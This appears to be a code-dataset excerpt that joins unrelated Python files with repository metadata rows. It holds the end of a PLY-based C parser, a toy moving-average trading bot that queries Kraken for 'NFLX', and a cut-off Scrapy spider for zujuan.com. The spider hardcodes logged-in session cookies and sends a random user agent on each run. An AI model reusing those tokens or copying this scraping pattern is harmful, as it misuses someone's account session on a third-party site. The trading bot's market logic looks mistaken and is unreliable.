def p_enum_specifier_3(self, p):
""" enum_specifier : ENUM ID brace_open enumerator_list brace_close
| ENUM TYPEID brace_open enumerator_list brace_close
"""
p[0] = c_ast.Enum(p[2], p[4], self._coord(p.lineno(1)))
def p_enumerator_list(self, p):
""" enumerator_list : enumerator
| enumerator_list COMMA
| enumerator_list COMMA enumerator
"""
if len(p) == 2:
p[0] = c_ast.EnumeratorList([p[1]], p[1].coord)
elif len(p) == 3:
p[0] = p[1]
else:
p[1].enumerators.append(p[3])
p[0] = p[1]
def p_enumerator(self, p):
""" enumerator : ID
| ID EQUALS constant_expression
"""
if len(p) == 2:
enumerator = c_ast.Enumerator(
p[1], None,
self._coord(p.lineno(1)))
else:
enumerator = c_ast.Enumerator(
p[1], p[3],
self._coord(p.lineno(1)))
self._add_identifier(enumerator.name, enumerator.coord)
p[0] = enumerator
def p_declarator_1(self, p):
""" declarator : direct_declarator
"""
p[0] = p[1]
def p_declarator_2(self, p):
""" declarator : pointer direct_declarator
"""
p[0] = self._type_modify_decl(p[2], p[1])
# Since it's impossible for a type to be specified after a pointer, assume
# it's intended to be the name for this declaration. _add_identifier will
# raise an error if this TYPEID can't be redeclared.
#
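    # Illustrative case (assumed): with "typedef char T;" in scope,
    # "int *T;" reuses T as an ordinary variable name after the pointer.
    #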
def p_declarator_3(self, p):
""" declarator : pointer TYPEID
"""
decl = c_ast.TypeDecl(
declname=p[2],
type=None,
quals=None,
coord=self._coord(p.lineno(2)))
p[0] = self._type_modify_decl(decl, p[1])
def p_direct_declarator_1(self, p):
""" direct_declarator : ID
"""
p[0] = c_ast.TypeDecl(
declname=p[1],
type=None,
quals=None,
coord=self._coord(p.lineno(1)))
def p_direct_declarator_2(self, p):
""" direct_declarator : LPAREN declarator RPAREN
"""
p[0] = p[2]
def p_direct_declarator_3(self, p):
""" direct_declarator : direct_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET
"""
quals = (p[3] if len(p) > 5 else []) or []
# Accept dimension qualifiers
# Per C99 6.7.5.3 p7
arr = c_ast.ArrayDecl(
type=None,
dim=p[4] if len(p) > 5 else p[3],
dim_quals=quals,
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
def p_direct_declarator_4(self, p):
""" direct_declarator : direct_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET
| direct_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET
"""
# Using slice notation for PLY objects doesn't work in Python 3 for the
# version of PLY embedded with pycparser; see PLY Google Code issue 30.
# Work around that here by listing the two elements separately.
listed_quals = [item if isinstance(item, list) else [item]
for item in [p[3],p[4]]]
dim_quals = [qual for sublist in listed_quals for qual in sublist
if qual is not None]
arr = c_ast.ArrayDecl(
type=None,
dim=p[5],
dim_quals=dim_quals,
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
# Special for VLAs
#
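    # i.e. the "[*]" form that may appear in prototypes, as in
    # (assumed): void f(int n, int a[*]);
    #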
def p_direct_declarator_5(self, p):
""" direct_declarator : direct_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET
"""
arr = c_ast.ArrayDecl(
type=None,
dim=c_ast.ID(p[4], self._coord(p.lineno(4))),
            dim_quals=p[3] if p[3] is not None else [],
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
def p_direct_declarator_6(self, p):
""" direct_declarator : direct_declarator LPAREN parameter_type_list RPAREN
| direct_declarator LPAREN identifier_list_opt RPAREN
"""
func = c_ast.FuncDecl(
args=p[3],
type=None,
coord=p[1].coord)
# To see why _get_yacc_lookahead_token is needed, consider:
# typedef char TT;
# void foo(int TT) { TT = 10; }
# Outside the function, TT is a typedef, but inside (starting and
# ending with the braces) it's a parameter. The trouble begins with
# yacc's lookahead token. We don't know if we're declaring or
# defining a function until we see LBRACE, but if we wait for yacc to
# trigger a rule on that token, then TT will have already been read
# and incorrectly interpreted as TYPEID. We need to add the
# parameters to the scope the moment the lexer sees LBRACE.
#
if self._get_yacc_lookahead_token().type == "LBRACE":
if func.args is not None:
for param in func.args.params:
if isinstance(param, c_ast.EllipsisParam): break
self._add_identifier(param.name, param.coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=func)
def p_pointer(self, p):
""" pointer : TIMES type_qualifier_list_opt
| TIMES type_qualifier_list_opt pointer
"""
coord = self._coord(p.lineno(1))
# Pointer decls nest from inside out. This is important when different
# levels have different qualifiers. For example:
#
# char * const * p;
#
# Means "pointer to const pointer to char"
#
# While:
#
# char ** const p;
#
# Means "const pointer to pointer to char"
#
# So when we construct PtrDecl nestings, the leftmost pointer goes in
# as the most nested type.
nested_type = c_ast.PtrDecl(quals=p[2] or [], type=None, coord=coord)
if len(p) > 3:
tail_type = p[3]
while tail_type.type is not None:
tail_type = tail_type.type
tail_type.type = nested_type
p[0] = p[3]
else:
p[0] = nested_type
def p_type_qualifier_list(self, p):
""" type_qualifier_list : type_qualifier
| type_qualifier_list type_qualifier
"""
p[0] = [p[1]] if len(p) == 2 else p[1] + [p[2]]
def p_parameter_type_list(self, p):
""" parameter_type_list : parameter_list
| parameter_list COMMA ELLIPSIS
"""
if len(p) > 2:
p[1].params.append(c_ast.EllipsisParam(self._coord(p.lineno(3))))
p[0] = p[1]
def p_parameter_list(self, p):
""" parameter_list : parameter_declaration
| parameter_list COMMA parameter_declaration
"""
if len(p) == 2: # single parameter
p[0] = c_ast.ParamList([p[1]], p[1].coord)
else:
p[1].params.append(p[3])
p[0] = p[1]
def p_parameter_declaration_1(self, p):
""" parameter_declaration : declaration_specifiers declarator
"""
spec = p[1]
if not spec['type']:
spec['type'] = [c_ast.IdentifierType(['int'],
coord=self._coord(p.lineno(1)))]
p[0] = self._build_declarations(
spec=spec,
decls=[dict(decl=p[2])])[0]
def p_parameter_declaration_2(self, p):
""" parameter_declaration : declaration_specifiers abstract_declarator_opt
"""
spec = p[1]
if not spec['type']:
spec['type'] = [c_ast.IdentifierType(['int'],
coord=self._coord(p.lineno(1)))]
# Parameters can have the same names as typedefs. The trouble is that
# the parameter's name gets grouped into declaration_specifiers, making
# it look like an old-style declaration; compensate.
#
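        # Illustrative case (assumed): with "typedef char TT;" in scope,
        # "void foo(int TT);" must treat TT as the parameter's name, not
        # as a second type specifier.
        #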
if len(spec['type']) > 1 and len(spec['type'][-1].names) == 1 and \
self._is_type_in_scope(spec['type'][-1].names[0]):
decl = self._build_declarations(
spec=spec,
decls=[dict(decl=p[2], init=None)])[0]
# This truly is an old-style parameter declaration
#
else:
decl = c_ast.Typename(
name='',
quals=spec['qual'],
type=p[2] or c_ast.TypeDecl(None, None, None),
coord=self._coord(p.lineno(2)))
typename = spec['type']
decl = self._fix_decl_name_type(decl, typename)
p[0] = decl
def p_identifier_list(self, p):
""" identifier_list : identifier
| identifier_list COMMA identifier
"""
if len(p) == 2: # single parameter
p[0] = c_ast.ParamList([p[1]], p[1].coord)
else:
p[1].params.append(p[3])
p[0] = p[1]
def p_initializer_1(self, p):
""" initializer : assignment_expression
"""
p[0] = p[1]
def p_initializer_2(self, p):
""" initializer : brace_open initializer_list_opt brace_close
| brace_open initializer_list COMMA brace_close
"""
if p[2] is None:
p[0] = c_ast.InitList([], self._coord(p.lineno(1)))
else:
p[0] = p[2]
def p_initializer_list(self, p):
""" initializer_list : designation_opt initializer
| initializer_list COMMA designation_opt initializer
"""
if len(p) == 3: # single initializer
init = p[2] if p[1] is None else c_ast.NamedInitializer(p[1], p[2])
p[0] = c_ast.InitList([init], p[2].coord)
else:
init = p[4] if p[3] is None else c_ast.NamedInitializer(p[3], p[4])
p[1].exprs.append(init)
p[0] = p[1]
def p_designation(self, p):
""" designation : designator_list EQUALS
"""
p[0] = p[1]
# Designators are represented as a list of nodes, in the order in which
# they're written in the code.
#
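    # e.g. (assumed) the designation ".a[0].b =" yields the list
    # [ID(a), Constant(0), ID(b)].
    #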
def p_designator_list(self, p):
""" designator_list : designator
| designator_list designator
"""
p[0] = [p[1]] if len(p) == 2 else p[1] + [p[2]]
def p_designator(self, p):
""" designator : LBRACKET constant_expression RBRACKET
| PERIOD identifier
"""
p[0] = p[2]
def p_type_name(self, p):
""" type_name : specifier_qualifier_list abstract_declarator_opt
"""
#~ print '=========='
#~ print p[1]
#~ print p[2]
#~ print p[2].children()
#~ print '=========='
typename = c_ast.Typename(
name='',
quals=p[1]['qual'],
type=p[2] or c_ast.TypeDecl(None, None, None),
coord=self._coord(p.lineno(2)))
p[0] = self._fix_decl_name_type(typename, p[1]['type'])
def p_abstract_declarator_1(self, p):
""" abstract_declarator : pointer
"""
dummytype = c_ast.TypeDecl(None, None, None)
p[0] = self._type_modify_decl(
decl=dummytype,
modifier=p[1])
def p_abstract_declarator_2(self, p):
""" abstract_declarator : pointer direct_abstract_declarator
"""
p[0] = self._type_modify_decl(p[2], p[1])
def p_abstract_declarator_3(self, p):
""" abstract_declarator : direct_abstract_declarator
"""
p[0] = p[1]
# Creating and using direct_abstract_declarator_opt here
# instead of listing both direct_abstract_declarator and the
# lack of it in the beginning of _1 and _2 caused two
# shift/reduce errors.
#
def p_direct_abstract_declarator_1(self, p):
""" direct_abstract_declarator : LPAREN abstract_declarator RPAREN """
p[0] = p[2]
def p_direct_abstract_declarator_2(self, p):
""" direct_abstract_declarator : direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET
"""
arr = c_ast.ArrayDecl(
type=None,
dim=p[3],
dim_quals=[],
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
def p_direct_abstract_declarator_3(self, p):
""" direct_abstract_declarator : LBRACKET assignment_expression_opt RBRACKET
"""
p[0] = c_ast.ArrayDecl(
type=c_ast.TypeDecl(None, None, None),
dim=p[2],
dim_quals=[],
coord=self._coord(p.lineno(1)))
def p_direct_abstract_declarator_4(self, p):
""" direct_abstract_declarator : direct_abstract_declarator LBRACKET TIMES RBRACKET
"""
arr = c_ast.ArrayDecl(
type=None,
dim=c_ast.ID(p[3], self._coord(p.lineno(3))),
dim_quals=[],
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=arr)
def p_direct_abstract_declarator_5(self, p):
""" direct_abstract_declarator : LBRACKET TIMES RBRACKET
"""
p[0] = c_ast.ArrayDecl(
type=c_ast.TypeDecl(None, None, None),
dim=c_ast.ID(p[3], self._coord(p.lineno(3))),
dim_quals=[],
coord=self._coord(p.lineno(1)))
def p_direct_abstract_declarator_6(self, p):
""" direct_abstract_declarator : direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN
"""
func = c_ast.FuncDecl(
args=p[3],
type=None,
coord=p[1].coord)
p[0] = self._type_modify_decl(decl=p[1], modifier=func)
def p_direct_abstract_declarator_7(self, p):
""" direct_abstract_declarator : LPAREN parameter_type_list_opt RPAREN
"""
p[0] = c_ast.FuncDecl(
args=p[2],
type=c_ast.TypeDecl(None, None, None),
coord=self._coord(p.lineno(1)))
# declaration is a list, statement isn't. To make it consistent, block_item
# will always be a list
#
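    # e.g. "int a, b;" already arrives as a two-element list of Decls,
    # while a lone statement such as "a = 1;" gets wrapped into a
    # one-element list here.
    #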
def p_block_item(self, p):
""" block_item : declaration
| statement
"""
p[0] = p[1] if isinstance(p[1], list) else [p[1]]
# Since we made block_item a list, this just combines lists
#
def p_block_item_list(self, p):
""" block_item_list : block_item
| block_item_list block_item
"""
# Empty block items (plain ';') produce [None], so ignore them
p[0] = p[1] if (len(p) == 2 or p[2] == [None]) else p[1] + p[2]
def p_compound_statement_1(self, p):
""" compound_statement : brace_open block_item_list_opt brace_close """
p[0] = c_ast.Compound(
block_items=p[2],
coord=self._coord(p.lineno(1)))
def p_labeled_statement_1(self, p):
""" labeled_statement : ID COLON statement """
p[0] = c_ast.Label(p[1], p[3], self._coord(p.lineno(1)))
def p_labeled_statement_2(self, p):
""" labeled_statement : CASE constant_expression COLON statement """
p[0] = c_ast.Case(p[2], [p[4]], self._coord(p.lineno(1)))
def p_labeled_statement_3(self, p):
""" labeled_statement : DEFAULT COLON statement """
p[0] = c_ast.Default([p[3]], self._coord(p.lineno(1)))
def p_selection_statement_1(self, p):
""" selection_statement : IF LPAREN expression RPAREN statement """
p[0] = c_ast.If(p[3], p[5], None, self._coord(p.lineno(1)))
def p_selection_statement_2(self, p):
""" selection_statement : IF LPAREN expression RPAREN statement ELSE statement """
p[0] = c_ast.If(p[3], p[5], p[7], self._coord(p.lineno(1)))
def p_selection_statement_3(self, p):
""" selection_statement : SWITCH LPAREN expression RPAREN statement """
p[0] = fix_switch_cases(
c_ast.Switch(p[3], p[5], self._coord(p.lineno(1))))
def p_iteration_statement_1(self, p):
""" iteration_statement : WHILE LPAREN expression RPAREN statement """
p[0] = c_ast.While(p[3], p[5], self._coord(p.lineno(1)))
def p_iteration_statement_2(self, p):
""" iteration_statement : DO statement WHILE LPAREN expression RPAREN SEMI """
p[0] = c_ast.DoWhile(p[5], p[2], self._coord(p.lineno(1)))
def p_iteration_statement_3(self, p):
""" iteration_statement : FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN statement """
p[0] = c_ast.For(p[3], p[5], p[7], p[9], self._coord(p.lineno(1)))
def p_iteration_statement_4(self, p):
""" iteration_statement : FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN statement """
p[0] = c_ast.For(c_ast.DeclList(p[3], self._coord(p.lineno(1))),
p[4], p[6], p[8], self._coord(p.lineno(1)))
def p_jump_statement_1(self, p):
""" jump_statement : GOTO ID SEMI """
p[0] = c_ast.Goto(p[2], self._coord(p.lineno(1)))
def p_jump_statement_2(self, p):
""" jump_statement : BREAK SEMI """
p[0] = c_ast.Break(self._coord(p.lineno(1)))
def p_jump_statement_3(self, p):
""" jump_statement : CONTINUE SEMI """
p[0] = c_ast.Continue(self._coord(p.lineno(1)))
def p_jump_statement_4(self, p):
""" jump_statement : RETURN expression SEMI
| RETURN SEMI
"""
p[0] = c_ast.Return(p[2] if len(p) == 4 else None, self._coord(p.lineno(1)))
def p_expression_statement(self, p):
""" expression_statement : expression_opt SEMI """
if p[1] is None:
p[0] = c_ast.EmptyStatement(self._coord(p.lineno(1)))
else:
p[0] = p[1]
def p_expression(self, p):
""" expression : assignment_expression
| expression COMMA assignment_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
if not isinstance(p[1], c_ast.ExprList):
p[1] = c_ast.ExprList([p[1]], p[1].coord)
p[1].exprs.append(p[3])
p[0] = p[1]
def p_typedef_name(self, p):
""" typedef_name : TYPEID """
p[0] = c_ast.IdentifierType([p[1]], coord=self._coord(p.lineno(1)))
def p_assignment_expression(self, p):
""" assignment_expression : conditional_expression
| unary_expression assignment_operator assignment_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = c_ast.Assignment(p[2], p[1], p[3], p[1].coord)
# K&R2 defines these as many separate rules, to encode
    # precedence and associativity. Why work hard? I'll just use
    # the built-in precedence/associativity specification feature
# of PLY. (see precedence declaration above)
#
def p_assignment_operator(self, p):
""" assignment_operator : EQUALS
| XOREQUAL
| TIMESEQUAL
| DIVEQUAL
| MODEQUAL
| PLUSEQUAL
| MINUSEQUAL
| LSHIFTEQUAL
| RSHIFTEQUAL
| ANDEQUAL
| OREQUAL
"""
p[0] = p[1]
def p_constant_expression(self, p):
""" constant_expression : conditional_expression """
p[0] = p[1]
def p_conditional_expression(self, p):
""" conditional_expression : binary_expression
| binary_expression CONDOP expression COLON conditional_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = c_ast.TernaryOp(p[1], p[3], p[5], p[1].coord)
def p_binary_expression(self, p):
""" binary_expression : cast_expression
| binary_expression TIMES binary_expression
| binary_expression DIVIDE binary_expression
| binary_expression MOD binary_expression
| binary_expression PLUS binary_expression
| binary_expression MINUS binary_expression
| binary_expression RSHIFT binary_expression
| binary_expression LSHIFT binary_expression
| binary_expression LT binary_expression
| binary_expression LE binary_expression
| binary_expression GE binary_expression
| binary_expression GT binary_expression
| binary_expression EQ binary_expression
| binary_expression NE binary_expression
| binary_expression AND binary_expression
| binary_expression OR binary_expression
| binary_expression XOR binary_expression
| binary_expression LAND binary_expression
| binary_expression LOR binary_expression
"""
if len(p) == 2:
p[0] = p[1]
else:
p[0] = c_ast.BinaryOp(p[2], p[1], p[3], p[1].coord)
def p_cast_expression_1(self, p):
""" cast_expression : unary_expression """
p[0] = p[1]
def p_cast_expression_2(self, p):
""" cast_expression : LPAREN type_name RPAREN cast_expression """
p[0] = c_ast.Cast(p[2], p[4], self._coord(p.lineno(1)))
def p_unary_expression_1(self, p):
""" unary_expression : postfix_expression """
p[0] = p[1]
def p_unary_expression_2(self, p):
""" unary_expression : PLUSPLUS unary_expression
| MINUSMINUS unary_expression
| unary_operator cast_expression
"""
p[0] = c_ast.UnaryOp(p[1], p[2], p[2].coord)
def p_unary_expression_3(self, p):
""" unary_expression : SIZEOF unary_expression
| SIZEOF LPAREN type_name RPAREN
"""
p[0] = c_ast.UnaryOp(
p[1],
p[2] if len(p) == 3 else p[3],
self._coord(p.lineno(1)))
def p_unary_operator(self, p):
""" unary_operator : AND
| TIMES
| PLUS
| MINUS
| NOT
| LNOT
"""
p[0] = p[1]
def p_postfix_expression_1(self, p):
""" postfix_expression : primary_expression """
p[0] = p[1]
def p_postfix_expression_2(self, p):
""" postfix_expression : postfix_expression LBRACKET expression RBRACKET """
p[0] = c_ast.ArrayRef(p[1], p[3], p[1].coord)
def p_postfix_expression_3(self, p):
""" postfix_expression : postfix_expression LPAREN argument_expression_list RPAREN
| postfix_expression LPAREN RPAREN
"""
p[0] = c_ast.FuncCall(p[1], p[3] if len(p) == 5 else None, p[1].coord)
def p_postfix_expression_4(self, p):
""" postfix_expression : postfix_expression PERIOD ID
| postfix_expression PERIOD TYPEID
| postfix_expression ARROW ID
| postfix_expression ARROW TYPEID
"""
field = c_ast.ID(p[3], self._coord(p.lineno(3)))
p[0] = c_ast.StructRef(p[1], p[2], field, p[1].coord)
def p_postfix_expression_5(self, p):
""" postfix_expression : postfix_expression PLUSPLUS
| postfix_expression MINUSMINUS
"""
p[0] = c_ast.UnaryOp('p' + p[2], p[1], p[1].coord)
def p_postfix_expression_6(self, p):
""" postfix_expression : LPAREN type_name RPAREN brace_open initializer_list brace_close
| LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close
"""
p[0] = c_ast.CompoundLiteral(p[2], p[5])
def p_primary_expression_1(self, p):
""" primary_expression : identifier """
p[0] = p[1]
def p_primary_expression_2(self, p):
""" primary_expression : constant """
p[0] = p[1]
def p_primary_expression_3(self, p):
""" primary_expression : unified_string_literal
| unified_wstring_literal
"""
p[0] = p[1]
def p_primary_expression_4(self, p):
""" primary_expression : LPAREN expression RPAREN """
p[0] = p[2]
def p_primary_expression_5(self, p):
""" primary_expression : OFFSETOF LPAREN type_name COMMA identifier RPAREN
"""
coord = self._coord(p.lineno(1))
p[0] = c_ast.FuncCall(c_ast.ID(p[1], coord),
c_ast.ExprList([p[3], p[5]], coord),
coord)
def p_argument_expression_list(self, p):
""" argument_expression_list : assignment_expression
| argument_expression_list COMMA assignment_expression
"""
if len(p) == 2: # single expr
p[0] = c_ast.ExprList([p[1]], p[1].coord)
else:
p[1].exprs.append(p[3])
p[0] = p[1]
def p_identifier(self, p):
""" identifier : ID """
p[0] = c_ast.ID(p[1], self._coord(p.lineno(1)))
def p_constant_1(self, p):
""" constant : INT_CONST_DEC
| INT_CONST_OCT
| INT_CONST_HEX
| INT_CONST_BIN
"""
p[0] = c_ast.Constant(
'int', p[1], self._coord(p.lineno(1)))
def p_constant_2(self, p):
""" constant : FLOAT_CONST
| HEX_FLOAT_CONST
"""
p[0] = c_ast.Constant(
'float', p[1], self._coord(p.lineno(1)))
def p_constant_3(self, p):
""" constant : CHAR_CONST
| WCHAR_CONST
"""
p[0] = c_ast.Constant(
'char', p[1], self._coord(p.lineno(1)))
# The "unified" string and wstring literal rules are for supporting
# concatenation of adjacent string literals.
# I.e. "hello " "world" is seen by the C compiler as a single string literal
# with the value "hello world"
#
def p_unified_string_literal(self, p):
""" unified_string_literal : STRING_LITERAL
| unified_string_literal STRING_LITERAL
"""
if len(p) == 2: # single literal
p[0] = c_ast.Constant(
'string', p[1], self._coord(p.lineno(1)))
else:
p[1].value = p[1].value[:-1] + p[2][1:]
p[0] = p[1]
def p_unified_wstring_literal(self, p):
""" unified_wstring_literal : WSTRING_LITERAL
| unified_wstring_literal WSTRING_LITERAL
"""
if len(p) == 2: # single literal
p[0] = c_ast.Constant(
'string', p[1], self._coord(p.lineno(1)))
else:
p[1].value = p[1].value.rstrip()[:-1] + p[2][2:]
p[0] = p[1]
def p_brace_open(self, p):
""" brace_open : LBRACE
"""
p[0] = p[1]
def p_brace_close(self, p):
""" brace_close : RBRACE
"""
p[0] = p[1]
def p_empty(self, p):
'empty : '
p[0] = None
def p_error(self, p):
# If error recovery is added here in the future, make sure
# _get_yacc_lookahead_token still works!
#
if p:
self._parse_error(
'before: %s' % p.value,
self._coord(lineno=p.lineno,
column=self.clex.find_tok_column(p)))
else:
self._parse_error('At end of input', '')
#------------------------------------------------------------------------------
if __name__ == "__main__":
import pprint
import time, sys
#t1 = time.time()
#parser = CParser(lex_optimize=True, yacc_debug=True, yacc_optimize=False)
#sys.write(time.time() - t1)
#buf = '''
#int (*k)(int);
#'''
## set debuglevel to 2 for debugging
#t = parser.parse(buf, 'x.c', debuglevel=0)
#t.show(showcoord=True)
| [
"[email protected]"
]
| |
15d401d6d7e7ae93bfe617029b03a032d777b847 | 50f747ae46f0c1c7aedbd701ec191f332779d103 | /Main/test_algo_bot.py | 6e49f7050bfa79fbf324a3383aa34d2cd02f718f | []
| no_license | marcellinamichie291/Machine_Teachers | 03c842187cd4352f01b98c20c17c60eedb08bf2d | 417e41428a65f88a7612874edaa60d7018ff9b0f | refs/heads/main | 2023-03-23T02:47:41.572264 | 2021-01-16T15:51:46 | 2021-01-16T15:51:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,269 | py | import os
import numpy as np
import pandas as pd
import ccxt
import time
from dotenv import load_dotenv
from numpy.random import seed
seed(1)
from tensorflow import random
random.set_seed(2)
from sklearn.preprocessing import MinMaxScaler
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import LSTM, Dense, Dropout
from stock_predictor import Stock_predictor
def initialize(cash=None):
"""Initialize the dashboard, data storage, and account balances."""
print("Intializing Account and DataFrame")
# Initialize Account
account = {"balance": cash, "shares": 0}
# Initialize dataframe
df = fetch_data()
# @TODO: We will complete the rest of this later!
return account, df
def build_dashboard(data, signals):
"""Build the dashboard."""
# @TODO: We will complete this later!
def fetch_data():
"""Fetches the latest prices."""
print("Fetching data...")
load_dotenv()
kraken_public_key = os.getenv("KRAKEN_PUBLIC_KEY")
kraken_secret_key = os.getenv("KRAKEN_SECRET_KEY")
kraken = ccxt.kraken({"apiKey": kraken_public_key, "secret": kraken_secret_key})
    # Fetch the ticker once and reuse it instead of making three
    # separate API calls for close, volume and datetime.
    ticker = kraken.fetch_ticker("NFLX")
    close = ticker["close"]
    volume = ticker["volume"]
    datetime = ticker["datetime"]
df = pd.DataFrame({"close": [close]})
df.index = pd.to_datetime([datetime])
return df
def generate_signals(df):
"""Generates trading signals for a given dataset."""
print("Generating Signals")
# Set window
short_window = 10
signals = df.copy()
signals["signal"] = 0.0
# Generate the short and long moving averages
signals["sma10"] = signals["close"].rolling(window=10).mean()
signals["sma20"] = signals["close"].rolling(window=20).mean()
# Generate the trading signal 0 or 1,
signals["signal"][short_window:] = np.where(
signals["sma10"][short_window:] > signals["sma20"][short_window:], 1.0, 0.0
)
# Calculate the points in time at which a position should be taken, 1 or -1
signals["entry/exit"] = signals["signal"].diff()
return signals
def execute_trade_strategy(signals, account):
"""Makes a buy/sell/hold decision."""
print("Executing Trading Strategy!")
if signals["entry/exit"].iloc[-1] == 1.0:
print("buy")
number_to_buy = round(account["balance"] / signals["close"].iloc[-1], 0) * 0.001
account["balance"] -= number_to_buy * signals["close"].iloc[-1]
account["shares"] += number_to_buy
elif signals["entry/exit"].iloc[-1] == -1.0:
print("sell")
account["balance"] += signals["close"].iloc[-1] * account["shares"]
account["shares"] = 0
else:
print("hold")
return account
print("Initializing account and DataFrame")
account, df = initialize(10000)
print(df)
def main():
while True:
global account
global df
# Fetch and save new data
new_df = fetch_data()
df = df.append(new_df, ignore_index=True)
min_window = 22
if df.shape[0] >= min_window:
signals = generate_signals(df)
print(signals)
account = execute_trade_strategy(signals, account)
time.sleep(.3)
main()
| [
"[email protected]"
]
| |
8a7ff0ad022e61991efae1db238130da5169b004 | 7259dbcc9e32502945d362caa43d4ad380cd04ea | /OIT_SpiderCode/OYT_zujuan_Param/OYT_Scrapy_Param/spiders/new_zujuan_English_middle_spiderparam.py | 27bc29f69ebc3bbe7b018e3cdfcf6fd90583eb7c | [
"MIT"
]
| permissive | Doraying1230/Python-Study | daa143c133262f4305624d180b38205afe241163 | 8dccfa2108002d18251053147ccf36551d90c22b | refs/heads/master | 2020-03-29T13:46:13.061373 | 2018-07-26T15:19:32 | 2018-07-26T15:19:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,915 | py | #coding:utf-8
import scrapy
from ..common.BaseObject import BaseObject
from scrapy.spider import CrawlSpider
from scrapy.selector import Selector
from scrapy.http import Request,FormRequest
from scrapy.selector import Selector
from scrapy.http.cookies import CookieJar
from fake_useragent import UserAgent
import time
import re
import os
class ZuQuanLoadData(BaseObject,CrawlSpider):
name = 'zujuan_english_middle_param'
custom_settings = {
'DOWNLOAD_DELAY': 3, 'CONCURRENT_REQUESTS_PER_IP': 5,
'ITEM_PIPELINES': {'OIT_ScrapyData.pipelines.OitScrapydataPipeline': None, }
}
def __init__(self):
ua = UserAgent()
user_agent = ua.random
self.file_name='zujuan_english_middle_param'
self.cookieValue = {'xd': '75519cb9f2bf90d001c0560f5c40520062a60ada9cb38350078f83e04ee38a31a%3A2%3A%7Bi%3A0%3Bs%3A2%3A%22xd%22%3Bi%3A1%3Bi%3A2%3B%7D',
'isdialog': 'bad3c21672f08107d1d921526d191f58bd47d79e7dbb432bd32624a836b42e85a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22isdialog%22%3Bi%3A1%3Bs%3A4%3A%22show%22%3B%7D',
'_csrf': '34c90a094ad3b3ab53cb75751fcab02bf693c164a6f5dfa244a6aec61e2f187ca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22YlTOGIyOfskw0gy-voJy0vbGw4VVswCs%22%3B%7D',
'device': '310bdaba05b30bb632f66fde9bf3e2b91ebc4d607c250c2e1a1d9e0dfb900f01a%3A2%3A%7Bi%3A0%3Bs%3A6%3A%22device%22%3Bi%3A1%3BN%3B%7D',
'PHPSESSID': 'utuj4csehjg3q9inhnuhptugk6',
'_sync_login_identity': '771bfb9f524cb8005c68374bdf39c9f22c36d71cf21d91082b96e7bd7a21e9eea%3A2%3A%7Bi%3A0%3Bs%3A20%3A%22_sync_login_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B1285801%2C%22YwmDuM6ftsN7jeMH7VDdT4OI-SvOisii%22%2C86400%5D%22%3B%7D',
'chid': '14e5d5f939c71d411898b3ee4671b5e06472c56cd9cffb59cc071e18732212f1a%3A2%3A%7Bi%3A0%3Bs%3A4%3A%22chid%22%3Bi%3A1%3Bs%3A1%3A%224%22%3B%7D',
'_identity': '95b973f53ecb67fdb27fe40c5660df1bbdb9c168cac8d1999dc6d0772a9ea122a%3A2%3A%7Bi%3A0%3Bs%3A9%3A%22_identity%22%3Bi%3A1%3Bs%3A50%3A%22%5B1285801%2C%22fa26ed63eeec36f3e1682f05b68cd887%22%2C86400%5D%22%3B%7D',
'Hm_lvt_6de0a5b2c05e49d1c850edca0c13051f': '1515666025',
'Hm_lpvt_6de0a5b2c05e49d1c850edca0c13051f': '1515666640'}
self.hearders = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Connection': 'keep - alive',
# 'Referer': 'http://www.zujuan.com/question /index?chid = 3 & xd = 1',
'User-Agent': user_agent#'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36'
}
print(self.hearders)
self.domain = 'http://www.zujuan.com'
def start_requests(self):
start_url = 'http://www.zujuan.com/question/index?chid=4&xd=2'
return [Request(url=start_url,cookies=self.cookieValue,headers=self.hearders,callback=self.parse_version)]
def parse_version(self,response):
result = response.body.decode()
resu = Selector(text=result)
versionTexts = resu.xpath('//div[@class="type-items"][1]/div/div/div/a/text()').extract()
versionUrls = resu.xpath('//div[@class="type-items"][1]/div/div/div/a/@href').extract()
version = dict(zip(versionTexts, versionUrls))
print(version)#{'人教版': '/question?bookversion=11740&chid=3&xd=1', '青岛版六三制': '/question?bookversion=23087&chid=3&xd=1', '北师大版': '/question?bookversion=23313&chid=3&xd=1', '苏教版': '/question?bookversion=25571&chid=3&xd=1', '西师大版': '/question?bookversion=47500&chid=3&xd=1', '青岛版五四制': '/question?bookversion=70885&chid=3&xd=1', '浙教版': '/question?bookversion=106060&chid=3&xd=1'}
        for text in version:
if ('牛津' in text):
manURL =self.domain+version[text]#http://www.zujuan.com/question?bookversion=25571&chid=3&xd=1
deliver_param = {'version':'牛津译林版'}
deliver_param['course'] = '英语'
return [Request(url=manURL, meta=deliver_param,cookies=self.cookieValue, headers=self.hearders,callback=self.parse_categories)]
            elif ('沪教' in text):
manURL = self.domain + version[text] # http://www.zujuan.com/question?bookversion=25571&chid=3&xd=1
deliver_param = {'version': '沪教版'}
deliver_param['course'] = '英语'
